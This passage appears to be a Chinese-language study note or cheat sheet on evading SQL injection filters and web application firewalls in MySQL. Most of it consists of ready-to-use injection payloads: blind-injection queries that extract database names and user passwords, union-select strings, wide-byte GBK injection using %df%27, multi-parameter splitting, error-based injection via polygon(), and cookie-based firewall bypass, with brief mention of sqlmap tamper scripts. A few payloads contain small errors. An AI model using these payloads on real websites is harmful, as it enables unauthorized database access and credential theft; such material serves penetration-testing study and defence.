select user() like 'r%'
对于limit可以使用offset来绕过:
select * from news limit 0,1
# 等价于下面这条SQL语句
select * from news limit 1 offset 0
比较符号(<>)绕过
使用greatest()、least():(前者返回最大值,后者返回最小值)
同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。
最常见的一个盲注的sql语句:
select * from users where id=1 and ascii(substr(database(),0,1))>64
此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。
那么上面的这条sql语句可以使用greatest变为如下的子句:
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64s
使用between and:
between a and b:返回a,b之间的数据,不包含b
or and xor not绕过
and=&& or=|| xor=| not=!
绕过注释符号
id=1' union select 1,2,3||'1
最后的or '1闭合查询语句的最后的单引号,或者:
id=1' union select 1,2,'3
=绕过
使用like 、rlike 、regexp 或者 使用< 或者 >
绕过union,select,where等
注释符
大小写
内敛注释
双写
编码(如URLEncode编码,ASCII,HEX,unicode编码绕过)
等价函数
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
substring()和substr()无法使用时:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
宽字节注入
过滤 ' 的时候往往利用的思路是将 ' 转换为 '。
在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:
(1)%df 吃掉 \ 具体的方法是 urlencode(') = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:
id=-1%df%27union select 1,user(),3--+
(2)将 ' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数:
1.replace():过滤 ' \ ,将 ' 转化为 ' ,将 \ 转为 \,将 " 转为 " 。用思路一。
2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:' , " , \ 。用思路一
(防御此漏洞,要将 mysql_query 设置为 binary 的方式)
3.mysql_real_escape_string():转义下列字符:
\x00 \n \r \ ' " \x1a
多参数请求拆分
and a=[input1] and b=[input2]
a=union/*&b=*/select 1,2,3,4
and a=union /*and b=*/select 1,2,3,4
HTTP参数污染
生僻函数
使用生僻函数替代常见的函数,例如在报错注入中使用polygon()函数替换常用的updatexml()函数
select polygon((select * from (select * from (select @@version) f) x));
寻找网站源IP
注入参数到cookie中
某些程序员在代码中使用$_REQUEST获取参数,而$_REQUEST会依次从GET/POST/cookie中获取参数,如果WAF只检测了GET/POST而没有检测cookie,则可以将注入语句放入cookie中进行绕过。
sqlmap tamper绕过waf
手上没有waf,留一点以后学习的思路。
通过上面的手工测试,判断waf过滤了哪些参数。
然后编写一个tamper,对waf过滤的参数进行集中替换,最然return ,sqlmap再进行调用。
